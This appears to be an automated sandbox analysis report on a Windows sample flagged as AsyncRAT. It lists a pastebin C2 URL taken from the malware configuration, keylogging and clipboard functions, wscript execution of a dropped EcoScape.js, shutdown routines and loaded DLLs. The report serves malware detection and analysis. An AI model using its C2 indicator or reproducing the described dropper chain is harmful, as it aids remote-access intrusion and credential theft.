Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://pastebin.com/raw/Dh8E7H3R

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Source: unknown

DNS traffic detected: query: sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF replaycode: Name error (3)

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004BD889 InternetReadFile,SetEvent,GetLastError,SetEvent,

11_2_004BD889

Source: unknown

DNS traffic detected: queries for: sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr, Plugins.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Telecom.pif, 0000000B.00000000.1216712688.0000000000515000.00000002.00000001.01000000.00000006.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, EcoScape.pif, 00000013.00000000.1232198341.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 0000001D.00000002.1397522322.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 00000027.00000000.1816275149.0000000000515000.00000002.00000001.01000000.00000009.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Commander.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: RegAsm.exe, 00000022.00000002.2442532871.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/Dh8E7H3R
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: EcoScape.pif.11.dr, Plugins.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

0_2_004056BB

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004BF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

11_2_004BF7C7

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

11_2_004BF55C

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

11_2_004AA635

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

11_2_004D9FD2

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript called in batch mode (surpress errors)

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004B4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

11_2_004B4763

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

11_2_004A1B4D

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040350A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004AF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		11_2_004AF20D

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00468017	11_2_00468017
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0045E144	11_2_0045E144
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0044E1F0	11_2_0044E1F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0047A26E	11_2_0047A26E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004622A2	11_2_004622A2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004422AD	11_2_004422AD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0045C624	11_2_0045C624
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0047E87F	11_2_0047E87F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004CC8A4	11_2_004CC8A4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B2A05	11_2_004B2A05
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00476ADE	11_2_00476ADE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004A8BFF	11_2_004A8BFF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0045CD7A	11_2_0045CD7A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0046CE10	11_2_0046CE10
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00477159	11_2_00477159
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00449240	11_2_00449240
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004D5311	11_2_004D5311
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004496E0	11_2_004496E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00461704	11_2_00461704
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00461A76	11_2_00461A76
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00449B60	11_2_00449B60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00467B8B	11_2_00467B8B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00461D20	11_2_00461D20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00467DBA	11_2_00467DBA
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00461FE7	11_2_00461FE7

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: String function: 00460DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: String function: 0045FD52 appears 40 times

One or more processes crash

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068

PE / OLE file has an invalid certificate

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: invalid certificate

PE file does not import any functions

Source: Northeast.0.dr

Static PE information: No import functions for PE file found

PE file overlay found

Source: Northeast.0.dr

Static PE information: Data appended to the last section found

Tries to load missing DLLs

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: ntmarta.dll	Jump to behavior
